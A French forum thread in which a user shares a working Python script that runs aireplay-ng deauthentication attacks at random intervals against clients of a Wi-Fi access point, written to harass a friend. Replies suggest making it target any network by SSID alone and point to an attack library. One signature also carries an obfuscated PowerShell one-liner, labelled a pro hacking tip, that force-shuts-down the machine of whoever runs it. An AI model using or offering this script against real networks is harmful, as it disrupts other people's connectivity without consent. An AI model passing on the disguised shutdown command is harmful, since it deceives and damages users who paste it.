Annonce

Réduire
Aucune annonce.

Aireplay-ng désauthentification aléatoire.

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Aireplay-ng désauthentification aléatoire.

    Bonsoir,

    Voici un petit script que j'ai fait pour rendre fou un ami, le but était de désauthentifier aléatoirement les périphériques connectés sur le point d'accès !
    Dans un premier temps il faut récupérer les adresses MAC des clients et celle du point d'accès avec Airodump-ng: # airodump-ng --essid [SSID] [INTERFACE_MONITOR].
    Ci-dessous la MAC de l'AP est 11:22:33:44:55:66 et les clients 11:11:11:11:11:11, 22:22:22:22:22:22, 33:33:33:33:33:33 à affiner avec vos adresses.

    Code:
    #!/usr/bin/python
    
    ####################################
    # Random deauth with aireplay-ng     
    # Use: # python script.py [number]
    # Auteur : ssh for hackademics.fr 
    # Date : 04/05/2017             
    # Version : 1.0                        
    ####################################
    
    import os
    import sys
    import time
    import random
    
    i = 1
    while True:
            pause = random.randrange(900,2700)
            count = random.randrange(30,300)
            mac = random.choice(['11:11:11:11:11:11','22:22:22:22:22:22','33:33:33:33:33:33'])
            print "Start : %s" % time.ctime()
            os.system('aireplay-ng -0 %s -a 11:22:33:44:55:66 -c %s [INTERFACE_MONITOR]'%(count, mac))
            print "End : %s" % time.ctime()
            print " "
            print "Pause de ",pause,"secondes."
            print " "
            time.sleep (pause)
            i = i + 1
            if i > int(sys.argv[1]):
                    break
    Peu de ligne mais très efficace, à consommer avec modération.
    J'attends vos feedbacks .
    Trust your technolust

  • #2
    Bonjour,

    Je ne vais pas parler de la problématique tout de suite, étant un puriste python, certaines choses m'interpellent:
    1. On est passé à la version 3 de python depuis plus de 10 ans, tu utilises encore la version 2
    2. On n'utilise pas os.system, mais plus subprocess qui est plus propre et stable
    3. En utilisant subprocess ou system, tu élimines tout l'intérêt du langage qui est sa portabilité


    Il y a sans doute une autre solution, quand j'ai le temps je regarde ça
    Dernière modification par fred, 05 mai 2017, 11h29.

    Commentaire


    • #3
      Heya !

      Pourquoi pas :
      for i in range(0,int(sys.argv[1])) :
      ...

      Sinon, il faudrait que ton script se charge de récupérer de lui même les différentes mac pour un SSID donné.
      Ainsi l'unique argument d'entré de ton script serait le SSID du réseau à pourrir, ce qui serait sensiblement plus intéressant
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Bonjour à tous,

        Voilà j'ai dis que je chercherai son équivalent python, le voici -> pyrcrack

        On voit par exemple dans le code source que la classe Aireplay accepte bien les attaques suivantes :

        Code:
         
        _allowed_attacks = (
        'deauth', 'fakeauth', 'interactive', 'arpreplay',
        'chopchop', 'fragment', 'caffe_latte', 'cfrag', 'migmode')
        Il fonctionne sous toutes versions python selon le code source, par contre je ne suis pas sûr de sa portabilité avec Windows, j'ai pas eu le temps de le tester.

        P.S Il faudra avoir le module psutil dans ses bagages avant de bosser avec pyrcrack.

        Commentaire


        • #5
          Hello,

          Merci pour vos retour constructifs, effectivement j'ai fait un mix de code qui n’est pas jolie du tout mais ça fonctionne .
          Au début j'étais parti sur la library "commands" mais je vais creuser pour faire cela en avec "subprocess" merci pour l’information fred.

          Effectivement l’idéal serait de récupérer les Mac des clients via ce même script mais à mon niveau je ne vois pas comment exécuter cette tâche (j’y avais pensé). De plus, il faut exécuter Airodump un moment pour récupérer les MAC. Je suis preneur si qui quelqu'un m'aide à ajouter cette fonction.
          Je teste sur mon Pi et sur mon joujou "Wi-Fi Pineapple" Windows ne m’intéresse pas pour le moment .

          Je vous tiens informé de la suite et reste ouvert aux propositions/aides.
          Trust your technolust

          Commentaire

          Chargement...
          X